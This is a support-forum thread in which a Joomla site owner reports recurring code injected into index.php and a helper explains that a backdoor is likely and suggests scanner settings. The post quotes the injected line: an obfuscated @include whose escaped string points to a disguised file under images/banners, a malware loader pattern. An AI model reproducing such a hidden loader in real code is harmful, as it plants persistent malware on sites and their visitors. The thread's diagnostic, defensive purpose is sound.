Topic-icon Code injected into index.php

  • bigfishtools
  • bigfishtools's Avatar Topic Author
  • Offline
  • Fresh Boarder
  • Fresh Boarder
1 month 2 weeks ago #7245 by bigfishtools
Code injected into index.php was created by bigfishtools
I'm having an issue with some code being injected into the index.php file in the root. I can remove it but it will be back in a day or two. Security Check is not showing any files changes if an integrity check is done and also it shows no malware? Have you seen this before? The inject code is @include("\151ma\147e\163/\142a\156n\145\162s\057\143l\145a\156\145\162\056j\160g");

Here is the complete file:

* @package Joomla.Site
* @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
* Define the application's minimum supported PHP version as a constant so it can be referenced within the application.
define('JOOMLA_MINIMUM_PHP', '5.3.10');

if (version_compare(PHP_VERSION, JOOMLA_MINIMUM_PHP, '<'))
die('Your host needs to use PHP ' . JOOMLA_MINIMUM_PHP . ' or higher to run this version of Joomla!');

// Saves the start time and memory usage.
$startTime = microtime(1);
$startMem = memory_get_usage();

* Constant that is checked in included files to prevent direct access.
* define() is used in the installation folder rather than "const" to not error for PHP 5.2 and lower
define('_JEXEC', 1);

if (file_exists(__DIR__ . '/defines.php'))
include_once __DIR__ . '/defines.php';

if (!defined('_JDEFINES'))
define('JPATH_BASE', __DIR__);
require_once JPATH_BASE . '/includes/defines.php';

require_once JPATH_BASE . '/includes/framework.php';

// Set profiler start time and memory usage and mark afterLoad in the profiler.
JDEBUG ? JProfiler::getInstance('Application')->setStart($startTime, $startMem)->mark('afterLoad') : null;

// Instantiate the application.
$app = JFactory::getApplication('site');

// Execute the application.

Please Log in or Create an account to join the conversation.

1 month 2 weeks ago #7246 by Jose
Replied by Jose on topic Code injected into index.php
Hi bigfishtools,

Yes, I have seen this many times before. I clean one or two sites infected with this malware every month. There should be a backdoor anywhere that allows the attackers to inject encoded code, usually at the beginning of some mandatory files, to load the malware (or perform some actions) everytime the site is visited.

But It's odd the file integrity scanner didn't show the change... maybe the original hash of the file was taken with that code and this is why you are not alerted about it. Regarding to the malware scanner, please be fully sure that it's configured to analyze the entire filesystem (Global configuration -> Malware scanner tab -> Timeline = Anytime) and also to look for suspicious patterns (Global configuration -> Malware scanner tab -> Deep scan = enabled).

If do you need help to clean the site just tell me and I will work on it.


Please Log in or Create an account to join the conversation.

Time to create page: 0.056 seconds
Powered by Kunena Forum

Login or Sign In